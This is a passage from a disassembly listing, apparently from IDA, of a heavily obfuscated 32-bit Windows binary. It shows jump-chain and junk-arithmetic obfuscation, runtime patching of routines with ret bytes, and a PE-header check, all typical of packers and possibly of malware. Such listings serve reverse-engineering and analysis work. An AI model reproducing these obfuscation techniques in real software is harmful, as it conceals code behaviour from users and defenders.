		jmp	loc_454B23
; END OF FUNCTION CHUNK	FOR sub_454EDD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_458E63:				; CODE XREF: sub_45A323:loc_44D83Cj
					; k2vbe3.d:00451587j
		add	edx, 0C1FD129Dh
		push	ecx
		push	94A93FA5h
		xchg	edi, [esp+20h+var_20]
		mov	ecx, edi
		pop	edi
		jmp	loc_4496DD
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444B3E

loc_458E7A:				; CODE XREF: sub_444B3E:loc_459C28j
		add	eax, 0F7BDCFC7h
		mov	eax, [eax]
		cmp	dword ptr [eax], 4550h
		jnz	loc_453900
		jmp	loc_4402B2
; END OF FUNCTION CHUNK	FOR sub_444B3E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452C99

loc_458E93:				; CODE XREF: sub_452C99:loc_44C9CFj
		add	ebx, 142EDADDh
		xor	edx, 129AB77h
		pop	eax
		pop	edx
		pop	ebx
		push	offset loc_446CA3
		jmp	loc_443AF3
; END OF FUNCTION CHUNK	FOR sub_452C99
; ---------------------------------------------------------------------------
		jmp	ds:off_41E1F0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CD01

loc_458EB2:				; CODE XREF: sub_43CD01+F1B9j
		jmp	nullsub_299
; END OF FUNCTION CHUNK	FOR sub_43CD01
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C3A9

loc_458EB7:				; CODE XREF: sub_43C3A9+DCD3j
		jmp	loc_44A324
; END OF FUNCTION CHUNK	FOR sub_43C3A9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4479A1

loc_458EBC:				; CODE XREF: sub_4479A1-27D2j
		jmp	loc_441B06
; END OF FUNCTION CHUNK	FOR sub_4479A1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441AE3

loc_458EC1:				; CODE XREF: sub_44BECA:loc_447C8Aj
					; sub_441AE3+7627j ...
		jno	loc_443C40
		xchg	edi, [esp-8+arg_4]
		mov	edx, edi
		pop	edi
		push	offset sub_4590BA
		jmp	sub_453DF1
; END OF FUNCTION CHUNK	FOR sub_441AE3

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_458ED7	proc near		; CODE XREF: sub_455500-86A4j
		retn
sub_458ED7	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457D4B

loc_458ED8:				; CODE XREF: sub_457D4B+441j
		jmp	loc_4441ED
; END OF FUNCTION CHUNK	FOR sub_457D4B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B999

loc_458EDD:				; CODE XREF: sub_44B999+Ej
		jmp	loc_448F99
; END OF FUNCTION CHUNK	FOR sub_44B999
; ---------------------------------------------------------------------------

loc_458EE2:				; CODE XREF: k2vbe3.d:loc_44E6ECj
		xchg	edx, [esp]
		jmp	loc_440BE7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4426DF

loc_458EEA:				; CODE XREF: sub_4426DF:loc_451653j
		rol	esi, 12h
		and	esi, 0A538C874h
		rol	esi, 15h
		call	sub_44DD31
		retn
; END OF FUNCTION CHUNK	FOR sub_4426DF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453AE8

loc_458EFC:				; CODE XREF: sub_453AE8:loc_44E4ACj
					; sub_45812F+19j
		jmp	loc_43C72D
; END OF FUNCTION CHUNK	FOR sub_453AE8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456666

loc_458F01:				; CODE XREF: sub_456666-685Cj
		jmp	loc_446B23
; END OF FUNCTION CHUNK	FOR sub_456666
; ---------------------------------------------------------------------------
		dw 212Ah
dword_458F08	dd 0A00DEE79h		; DATA XREF: sub_45AA0B:loc_44AEFBr
					; sub_455C7A+5339w

; =============== S U B	R O U T	I N E =======================================



sub_458F0C	proc near		; CODE XREF: sub_410870+22p
					; sub_419A9F+29p ...
		call	sub_458F1C
		jmp	ds:off_41E054
sub_458F0C	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F655

loc_458F17:				; CODE XREF: sub_44F655+Bj
		jmp	loc_4439D9
; END OF FUNCTION CHUNK	FOR sub_44F655

; =============== S U B	R O U T	I N E =======================================



sub_458F1C	proc near		; CODE XREF: sub_44A7CD+4A97j
					; sub_458F1C-6488j ...

; FUNCTION CHUNK AT 00442242 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 004472A0 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004472AE SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044F269 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044FA9E SIZE 00000028 BYTES
; FUNCTION CHUNK AT 00450DDD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452A91 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00459E4A SIZE 00000005 BYTES

		pop	edx
		jns	loc_44F269
		mov	eax, [esp+0]
		jmp	loc_4472A0
sub_458F1C	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_396. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457A42

loc_458F2C:				; CODE XREF: sub_457A42-10B08j
		jmp	loc_454664
; END OF FUNCTION CHUNK	FOR sub_457A42
; ---------------------------------------------------------------------------

loc_458F31:				; CODE XREF: k2vbe3.d:0044DF71j
		jb	loc_44BE55

; =============== S U B	R O U T	I N E =======================================



sub_458F37	proc near		; CODE XREF: sub_44E90D:loc_454CB2p

; FUNCTION CHUNK AT 0043F02C SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00457CF1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459AFA SIZE 0000000B BYTES

		xchg	edx, [esp+0]
		pop	edx
		cmp	byte ptr [eax],	0F1h
		jnz	loc_43F02C
		jmp	loc_459AFA
sub_458F37	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454354

loc_458F49:				; CODE XREF: sub_454354+Dj
		jz	loc_45408A
		jmp	loc_451D23
; END OF FUNCTION CHUNK	FOR sub_454354

; =============== S U B	R O U T	I N E =======================================



sub_458F54	proc near		; DATA XREF: sub_45825C+13o

; FUNCTION CHUNK AT 0044D490 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044EBFB SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00457053 SIZE 00000005 BYTES

		xor	eax, 23966D79h
		ror	eax, 4
		mov	edx, [esp+0]
		jmp	loc_44EBFB
sub_458F54	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BDBB

loc_458F65:				; CODE XREF: sub_44BDBB:loc_441A47j
		ror	eax, 17h
		push	esi
		push	0EBFA1F96h
		pop	esi
		jmp	loc_45BDC2
; END OF FUNCTION CHUNK	FOR sub_44BDBB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FDC1

loc_458F74:				; CODE XREF: sub_43FDC1:loc_451BF5j
		not	ebx
		and	edx, 5E7AEF62h
		or	ecx, esi
		mov	[esi], ecx
		jmp	loc_44386D
; END OF FUNCTION CHUNK	FOR sub_43FDC1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FDAC

loc_458F85:				; CODE XREF: sub_44FDAC+C429j
		xchg	esi, [esp+0Ch+var_C]
		push	offset loc_43CC50
		jmp	loc_447D04
; END OF FUNCTION CHUNK	FOR sub_44FDAC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45101A

loc_458F92:				; CODE XREF: sub_45101A+A7Fj
		test	esi, ecx
		jmp	loc_443A78
; END OF FUNCTION CHUNK	FOR sub_45101A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450CBF

loc_458F99:				; CODE XREF: sub_450CBF+83D7j
		test	esi, 7850264Ah
		jmp	loc_44A743
; END OF FUNCTION CHUNK	FOR sub_450CBF
; ---------------------------------------------------------------------------

loc_458FA4:				; CODE XREF: k2vbe3.d:loc_441ED1j
		mov	ebx, ecx
		pop	ecx
		lea	eax, sub_459AEA
		mov	byte ptr [eax],	0C3h
		jmp	loc_44EE50
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459AEA

loc_458FB5:				; CODE XREF: sub_459AEA+1j
		mov	eax, [esp+0]
		push	offset loc_448CB1
		jmp	loc_44A442
; END OF FUNCTION CHUNK	FOR sub_459AEA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B912

loc_458FC2:				; CODE XREF: sub_44B912:loc_455C8Ej
					; DATA XREF: sub_43DEBE+19857o
		add	eax, 13BC01D1h
		push	ebx
		pushf
		push	717C3F30h
		pop	ebx
		and	ebx, ds:4000F3h
		rol	ebx, 1Dh
		xor	ebx, 0DBD83A23h
		jmp	loc_451073
; END OF FUNCTION CHUNK	FOR sub_44B912
; ---------------------------------------------------------------------------

loc_458FE4:				; CODE XREF: k2vbe3.d:0044C686j
		jz	sub_44AA92
		ja	loc_451B22

loc_458FF0:				; CODE XREF: k2vbe3.d:loc_44B865j
		call	nullsub_17
		retn
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_17. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B2D7

loc_458FF7:				; CODE XREF: sub_44B2D7+E12Dj
		jmp	loc_440E2B
; END OF FUNCTION CHUNK	FOR sub_44B2D7
; ---------------------------------------------------------------------------

loc_458FFC:				; CODE XREF: sub_451287+6j
		push	esi
		push	0C3D90A35h
		jmp	loc_4502F9
; ---------------------------------------------------------------------------

loc_459007:				; CODE XREF: k2vbe3.d:loc_442C6Ej
		test	ebx, 20000000h
		jmp	loc_4503EA
; ---------------------------------------------------------------------------
		dw 8A0Fh
; ---------------------------------------------------------------------------
		cli
		mov	ebx, 0CB81FFFEh
		xchg	bh, [ebp-0Dh]
		pop	ebp
		jmp	loc_448234
; ---------------------------------------------------------------------------
		and	edi, ebx
		jmp	loc_455208
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449372

loc_45902A:				; CODE XREF: sub_449372:loc_43E238j
		jz	loc_43F78E
		jmp	loc_44214E
; END OF FUNCTION CHUNK	FOR sub_449372
; ---------------------------------------------------------------------------

loc_459035:				; CODE XREF: k2vbe3.d:00459BE1j
		mov	eax, 24DE0EA8h
		call	sub_4553CC
		mov	ds:off_41E160, eax
		lea	eax, sub_450740
		jmp	loc_4591E1
; ---------------------------------------------------------------------------

loc_459050:				; DATA XREF: sub_44AD9D:loc_4573D0o
		mov	eax, ds:dword_44BDA8
		or	eax, eax
		jnz	loc_4510E1
		jmp	loc_44A3E9
; ---------------------------------------------------------------------------

loc_459063:				; CODE XREF: k2vbe3.d:loc_441EDBj
		xor	eax, 0BFC6478Eh
		or	eax, ds:4000EAh
		sub	eax, 0E7BF8E87h
		add	eax, 6C2436C0h
		xchg	eax, [esp]
		jmp	sub_4479A1
; ---------------------------------------------------------------------------

loc_459083:				; CODE XREF: k2vbe3.d:loc_45273Cj
		jz	loc_450CE0
		jmp	loc_44E899
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450CBF

loc_45908E:				; CODE XREF: k2vbe3.d:loc_43FBD0j
					; sub_450CBF:loc_4462A7j
		sbb	edi, 26212E79h
		shr	ebp, 1
		jmp	loc_458F99
; END OF FUNCTION CHUNK	FOR sub_450CBF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DB59

loc_45909B:				; CODE XREF: sub_44DB59-4CCDj
		xor	esi, eax

loc_45909D:				; CODE XREF: sub_44DB59:loc_4586B9j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_453FAE
		jmp	loc_446ABB
; END OF FUNCTION CHUNK	FOR sub_44DB59
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442F64

loc_4590AE:				; CODE XREF: sub_442F64+6C06j
		sub	edx, ebx

loc_4590B0:				; CODE XREF: sub_442F64:loc_44BB16j
		call	sub_4436CE
		call	sub_442577
; END OF FUNCTION CHUNK	FOR sub_442F64

; =============== S U B	R O U T	I N E =======================================



sub_4590BA	proc near		; CODE XREF: sub_458ED7j
					; DATA XREF: sub_441AE3+173EAo

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043E25A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044230A SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044430B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449CE8 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044A33A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452201 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00456D21 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A292 SIZE 0000000B BYTES

		mov	eax, [esp+4+var_4]
		push	edx
		call	sub_4479A1
		push	74B1844Fh
		pop	eax
		sub	eax, ds:4000F1h
		xor	eax, 0F3F62FC7h
		add	eax, 4A2D537Fh
		jmp	loc_43E25A
sub_4590BA	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448DD4

loc_4590E0:				; CODE XREF: sub_448DD4:loc_45892Cj
		mov	[ebp-24h], eax
		push	offset loc_45835B
		jmp	loc_45987A
; END OF FUNCTION CHUNK	FOR sub_448DD4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444966

loc_4590ED:				; CODE XREF: sub_444966:loc_441BAEj
		rol	ecx, 8
		sub	ecx, 0D8D37EB9h
		or	ecx, 88DA0228h
		push	offset sub_441F02
		jmp	nullsub_307
; END OF FUNCTION CHUNK	FOR sub_444966
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CDC9

loc_459106:				; CODE XREF: sub_44CDC9:loc_43CA6Aj
		setnz	al
		call	sub_456A5F
		push	offset sub_44A4F5
		jmp	nullsub_313
; END OF FUNCTION CHUNK	FOR sub_44CDC9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4445E2

loc_459118:				; CODE XREF: sub_4445E2:loc_43C22Fj
		push	eax
		mov	eax, edx
		push	edx
		push	7535FDA6h
		pop	edx
		xor	edx, 311FE642h
		and	edx, 0F23A65B5h
		jmp	loc_45A180
; END OF FUNCTION CHUNK	FOR sub_4445E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B979

loc_459133:				; CODE XREF: sub_44B979:loc_43DFC7j
		and	edx, eax
		jmp	loc_4417E2
; END OF FUNCTION CHUNK	FOR sub_44B979
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_357. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4499EC

loc_45913B:				; CODE XREF: sub_4499EC:loc_448C8Dj
		mov	ds:off_41E1EC, eax
		lea	eax, loc_4410C5
		mov	byte ptr [eax],	0C3h
		jmp	loc_442864
; END OF FUNCTION CHUNK	FOR sub_4499EC

; =============== S U B	R O U T	I N E =======================================



sub_45914F	proc near		; CODE XREF: sub_4198C0+3Cp
					; sub_4198C0+43p ...
		push	offset sub_45C27A
		jmp	nullsub_308
sub_45914F	endp

; ---------------------------------------------------------------------------

loc_459159:				; CODE XREF: k2vbe3.d:0045B541j
		jb	loc_44055C
; START	OF FUNCTION CHUNK FOR sub_4431FE

loc_45915F:				; CODE XREF: sub_4431FE+Cj
		and	edx, 630B1634h
		or	edx, 9DC270ACh
		and	edx, 3A2AEA09h
		add	edx, 0C637809Ch
		mov	[edx], eax
		pop	edx
		lea	eax, sub_44803D
		jmp	loc_44B033
; END OF FUNCTION CHUNK	FOR sub_4431FE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44600A

loc_459185:				; CODE XREF: sub_44600A:loc_44A0BCj
		pop	edx
		add	esi, 282C71BFh
		sub	esi, 5610462Ch
		test	esi, 800000h
		jmp	loc_44EE4A
; END OF FUNCTION CHUNK	FOR sub_44600A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444144

loc_45919D:				; CODE XREF: sub_444144:loc_43F1A1j
		jz	loc_44ECDB
		cmp	eax, ecx
		jmp	loc_44606C
; END OF FUNCTION CHUNK	FOR sub_444144
; ---------------------------------------------------------------------------

loc_4591AA:				; DATA XREF: sub_45AB7E+Co
		mov	eax, [esp]
		call	sub_43E67B
; START	OF FUNCTION CHUNK FOR sub_445F22

loc_4591B2:				; CODE XREF: sub_445F22+9AF1j
		jmp	loc_4423BD
; END OF FUNCTION CHUNK	FOR sub_445F22
; ---------------------------------------------------------------------------
		push	edi
		jmp	loc_444A84
; ---------------------------------------------------------------------------

loc_4591BD:				; DATA XREF: sub_44D298:loc_442D7Fo
		push	4869A8FCh
		pop	edx
		sub	edx, 0A3040F50h
		rol	edx, 17h
		jmp	loc_456043
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4460FD

loc_4591D1:				; CODE XREF: sub_4460FD+E61Ej
		jno	loc_44EDC0

loc_4591D7:				; CODE XREF: sub_4460FD:loc_43E6DEj
		push	offset loc_457ACE
		jmp	nullsub_310
; END OF FUNCTION CHUNK	FOR sub_4460FD
; ---------------------------------------------------------------------------

loc_4591E1:				; CODE XREF: k2vbe3.d:0045904Bj
		mov	byte ptr [eax],	0C3h
		jmp	sub_450740
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C7D

loc_4591E9:				; CODE XREF: sub_440C7D+5j
		mov	eax, [esp-8+arg_4]
		push	edx
		call	sub_454E83
		push	156D5E9Ah
		pop	eax
		or	eax, 88DB3DBCh
		jmp	loc_455DE9
; END OF FUNCTION CHUNK	FOR sub_440C7D
; ---------------------------------------------------------------------------
		test	al, al
		jz	loc_4559A3
		jmp	loc_447CE2
; ---------------------------------------------------------------------------

loc_459210:				; CODE XREF: k2vbe3.d:00456499j
		adc	ecx, 1BEED350h

; =============== S U B	R O U T	I N E =======================================



sub_459216	proc near		; CODE XREF: sub_446CCF+E9C9p

; FUNCTION CHUNK AT 00441E80 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004502B0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004539D2 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00458294 SIZE 00000017 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		lea	eax, [ebp-125h]
		push	eax
		call	sub_4508A3
		mov	[ebp-4], eax
		cmp	dword ptr [ebp-4], 0
		jmp	loc_458294
sub_459216	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_255. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E00F

loc_459233:				; CODE XREF: sub_4527CB+9j
					; sub_44E00F+7FE1j
		jmp	loc_43F17F
; END OF FUNCTION CHUNK	FOR sub_44E00F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443FC1

loc_459238:				; CODE XREF: sub_443FC1+6BD0j
		jmp	loc_44263A
; END OF FUNCTION CHUNK	FOR sub_443FC1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449372

loc_45923D:				; CODE XREF: sub_449372-2CB0j
		jmp	nullsub_195
; END OF FUNCTION CHUNK	FOR sub_449372
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448FCC

loc_459242:				; CODE XREF: sub_448FCC-3A11j
		jmp	nullsub_311
; END OF FUNCTION CHUNK	FOR sub_448FCC
; ---------------------------------------------------------------------------

loc_459247:				; CODE XREF: k2vbe3.d:00452983j
		shr	edx, 1Bh
		and	esi, 3810B582h
		jmp	loc_43E6B1
; ---------------------------------------------------------------------------

loc_459255:				; CODE XREF: k2vbe3.d:loc_450188j
		push	ebx
		mov	ebx, eax
		xchg	ebx, [esp]
		push	ebx
		js	loc_44FBC3
		jmp	loc_43C02B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4443DD

loc_459267:				; CODE XREF: sub_4443DD:loc_440CE0j
		mov	eax, edi
		pop	edi
		or	eax, ds:4000F2h
		cmp	eax, 67CC69E5h
		jmp	loc_45176A
; END OF FUNCTION CHUNK	FOR sub_4443DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453100

loc_45927B:				; CODE XREF: sub_453100+18j
		jge	loc_447AC0
; END OF FUNCTION CHUNK	FOR sub_453100
; START	OF FUNCTION CHUNK FOR sub_4498C1

loc_459281:				; CODE XREF: sub_4498C1+11j
		jmp	loc_457B8C
; END OF FUNCTION CHUNK	FOR sub_4498C1
; ---------------------------------------------------------------------------

loc_459286:				; CODE XREF: k2vbe3.d:00442C92j
		jmp	sub_44EEFE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F71

loc_45928B:				; CODE XREF: sub_450F71-14884j
		jmp	loc_4438A8
; END OF FUNCTION CHUNK	FOR sub_450F71
; ---------------------------------------------------------------------------
		rol	ebp, 6
		or	ebx, esi
		jmp	loc_447ABC

; =============== S U B	R O U T	I N E =======================================



sub_45929A	proc near		; CODE XREF: k2vbe3.d:0043CD2Dj
					; sub_449DA2+78D7p
		xchg	edx, [esp+0]
		pop	edx
		sbb	edx, ebx
		call	sub_43CD01

locret_4592A5:				; CODE XREF: sub_4514E2:loc_441831j
		retn
sub_45929A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B8EF

loc_4592A6:				; CODE XREF: sub_44B8EF:loc_44175Dj
		or	ebx, 0E6EE4735h
		sub	ebx, 1E94E4Dh
		and	ebx, 2C1A3FEh
		add	ebx, offset dword_42D570
		xchg	ebx, [esp+0]
		jmp	loc_452731
; END OF FUNCTION CHUNK	FOR sub_44B8EF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459A60

loc_4592C6:				; CODE XREF: sub_459A60:loc_45A01Aj
		jno	loc_44D40E
		jmp	loc_457788
; END OF FUNCTION CHUNK	FOR sub_459A60
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_380. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_4592D2:				; CODE XREF: k2vbe3.d:00450CE1j
		jmp	loc_44104A
; ---------------------------------------------------------------------------

locret_4592D7:				; CODE XREF: k2vbe3.d:loc_4411A5j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443FC1

loc_4592D8:				; CODE XREF: sub_443FC1+125FBj
		shl	eax, 0Eh

loc_4592DB:				; CODE XREF: sub_443FC1:loc_4565AEj
		and	eax, 80B2AB69h
		add	eax, 80335113h
		mov	eax, [eax]
		jmp	loc_450899
; END OF FUNCTION CHUNK	FOR sub_443FC1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444297

loc_4592EE:				; CODE XREF: sub_444297-1E7Ej
		pop	eax
		sub	eax, 0AEBCA008h
		xor	eax, 999C9803h
		add	eax, ebp
		add	eax, 844C991Eh
		mov	dword ptr [eax], 646E6957h
		push	1826ED1Fh
		pop	eax
		jmp	loc_45C285
; END OF FUNCTION CHUNK	FOR sub_444297
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4530DF

loc_459314:				; CODE XREF: sub_4530DF:loc_4543FCj
		sub	eax, 0FDB81B1Dh
		rol	eax, 1Eh
		sub	eax, 7287FE66h
		add	eax, 0E19A17A8h
		xor	eax, 46807192h
		add	eax, ebp
		jmp	loc_43D034
; END OF FUNCTION CHUNK	FOR sub_4530DF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_459336:				; CODE XREF: sub_43CCD0+19F30j
		pop	ebp

loc_459337:				; CODE XREF: sub_444EFA:loc_44AB2Bj
		push	offset sub_44F1A6
		jmp	nullsub_356
; END OF FUNCTION CHUNK	FOR sub_43CCD0
; ---------------------------------------------------------------------------

loc_459341:				; CODE XREF: k2vbe3.d:00457D02j
		jnp	loc_453BEA

; =============== S U B	R O U T	I N E =======================================



sub_459347	proc near		; CODE XREF: sub_45A980-3CD9p

; FUNCTION CHUNK AT 0045BF9D SIZE 00000007 BYTES

		xchg	eax, [esp+0]
		pop	eax
		sub	ebx, ecx
		or	ecx, 27854EC9h
		pop	ecx
		jmp	loc_45BF9D
sub_459347	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_459359:				; CODE XREF: k2vbe3.d:004478EEj
		pop	eax
		and	eax, 6CBDC4BAh
		call	sub_442F4C
; START	OF FUNCTION CHUNK FOR sub_452CF7

loc_459365:				; CODE XREF: sub_452CF7+Aj
		jmp	sub_440D7B
; END OF FUNCTION CHUNK	FOR sub_452CF7
; ---------------------------------------------------------------------------

loc_45936A:				; CODE XREF: k2vbe3.d:00444CC7j
		jmp	loc_45788A
; ---------------------------------------------------------------------------

loc_45936F:				; CODE XREF: k2vbe3.d:0043E8AEj
		adc	eax, edx

; =============== S U B	R O U T	I N E =======================================



sub_459371	proc near		; CODE XREF: k2vbe3.d:loc_44BFA5p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044EF97 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00454815 SIZE 0000000D BYTES

		xchg	ebx, [esp+0]
		xchg	edi, [esp+0]
		mov	ebx, edi
		pop	edi
		push	ebp
		jmp	loc_44EF97
sub_459371	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_459380:				; DATA XREF: sub_440621+417Fo
		pop	ebp
		retn

; =============== S U B	R O U T	I N E =======================================



sub_459382	proc near		; CODE XREF: sub_43F34C+3DC8j
					; k2vbe3.d:0045183Fj ...

; FUNCTION CHUNK AT 00444533 SIZE 0000000A BYTES

		jnb	loc_444533
		push	ebp

loc_459389:				; CODE XREF: k2vbe3.d:loc_45388Bj
		push	offset loc_443C95
		jmp	loc_44547C
sub_459382	endp

; ---------------------------------------------------------------------------
		jmp	ds:off_41E014
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4467A1

loc_459399:				; CODE XREF: sub_4467A1+150EEj
		jmp	sub_4553CC
; END OF FUNCTION CHUNK	FOR sub_4467A1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4580D1

loc_45939E:				; CODE XREF: sub_4580D1+9j
		jmp	loc_4593B7
; END OF FUNCTION CHUNK	FOR sub_4580D1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C82E

loc_4593A3:				; CODE XREF: sub_43C82E+17FFAj
		jmp	nullsub_315
; END OF FUNCTION CHUNK	FOR sub_43C82E
; ---------------------------------------------------------------------------

loc_4593A8:				; CODE XREF: k2vbe3.d:0044A496j
		jmp	loc_44222F
; ---------------------------------------------------------------------------

loc_4593AD:				; CODE XREF: k2vbe3.d:00441157j
		jmp	loc_43CE89
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448B5E

loc_4593B2:				; CODE XREF: sub_448B5E-9B9Aj
		jmp	loc_43C153
; ---------------------------------------------------------------------------

loc_4593B7:				; CODE XREF: sub_448B5E-CA08j
					; k2vbe3.d:loc_45234Aj	...
		pop	edx
		js	loc_43F6AF
		mov	eax, [esp+0]
		push	edx
		call	sub_444FB1
		mov	eax, 3E69A3C2h
		call	sub_449CAB

loc_4593D1:				; CODE XREF: sub_44B5DC+8j
		jmp	nullsub_317
; END OF FUNCTION CHUNK	FOR sub_448B5E

; =============== S U B	R O U T	I N E =======================================



sub_4593D6	proc near		; CODE XREF: sub_444944+AF46j
					; sub_44B94B:loc_4546FFj

; FUNCTION CHUNK AT 0044385B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445610 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BC1A SIZE 00000014 BYTES

		push	ebx
		push	9EF2FA65h
		pop	ebx
		rol	ebx, 2
		jmp	loc_445610
sub_4593D6	endp

; ---------------------------------------------------------------------------
		push	offset sub_44D277
		jmp	locret_4559DF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B2D7

loc_4593EF:				; CODE XREF: sub_44B2D7-9A4j
		add	eax, ebp
		jbe	loc_4426ED

loc_4593F7:				; CODE XREF: sub_44B2D7:loc_4477FAj
		push	ecx
		push	5F91F444h
		pop	ecx
		sub	ecx, 0A2472C7Ch
		jmp	loc_458FF7
; END OF FUNCTION CHUNK	FOR sub_44B2D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4572F6

loc_459409:				; CODE XREF: sub_4572F6:loc_457302j
					; k2vbe3.d:00459594j
		mov	ebx, eax
		xchg	ebx, [esp-4+arg_0]
		call	sub_4515E7

loc_459413:				; CODE XREF: sub_457A42-33D8j
		jmp	loc_450A2A
; END OF FUNCTION CHUNK	FOR sub_4572F6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_459418:				; CODE XREF: sub_44B94B+2081j
		jmp	loc_43FBC5
; END OF FUNCTION CHUNK	FOR sub_44B94B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448FDB

loc_45941D:				; CODE XREF: sub_448FDB+1Fj
		jmp	loc_43EDDE
; END OF FUNCTION CHUNK	FOR sub_448FDB
